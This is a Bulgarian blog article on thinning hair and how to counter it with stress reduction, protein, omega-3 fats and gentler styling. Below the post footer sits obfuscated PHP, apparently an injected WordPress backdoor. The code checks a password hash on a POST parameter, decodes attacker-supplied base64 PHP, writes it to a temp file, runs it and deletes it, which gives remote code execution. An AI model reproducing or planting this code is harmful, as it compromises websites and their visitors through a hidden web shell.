Изтъняване на косата – какво да правим? | Косопад

Изтъняване на косата – какво да правим?

kosa-mitove

Стресът, небалансираното хранене, хормоналните промени, дълго и агресивно лечение с лекарства или неправилни грижи за скалпа, могат да доведат до изтъняване  на косата. Това е често срещан проблем и при мъжете, и при жените. Причините могат да са свързани с наследственост, неправилно хранене, лоша хигиена на скалпа. Косата започва да губи обем и плътност, става тънка.

Признаците за появата на проблема са особено видими при хората с дълги коси. При късите коси по- трудно се забелязва в началото.

kosa-tanka

Когато една жена си направи опашка и й се стори, че има по- малко коса, е сред сигурните знаци за изтъняване. Забелязва се и че диаметърът на косъма започва да намалява.

За да имаме здрава коса, най- препоръчително е да се храним здравословно, да избягваме силния и продължителен стрес. Но съвременния ритъм на живот доста ни затруднява в изпълнението на тези условия.

Ето как можете да въздействате:

1. Променете начина си на живот, като намалите стреса и отделяте повече време за почивка. Занимавайте се с йога и медитация, за да намалите производството на хормона кортизол, известен като хормон на стреса.

2. Приемайте повече протеини чрез храната си. Липсата им изтънява косата. Наблегнете на рибата, бялото месо, бобовите култури, млечните продукти.

3. Не забравяйте да ядете омега- 3 мазнини. Съдържат се доста в храни като сьомга и орехи.

4. Ако забележите, че имате косопад, започнете веднага да го третирате. Ограничете уредите като сешоар и преса.

13. октомври 2015 19:06:23 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}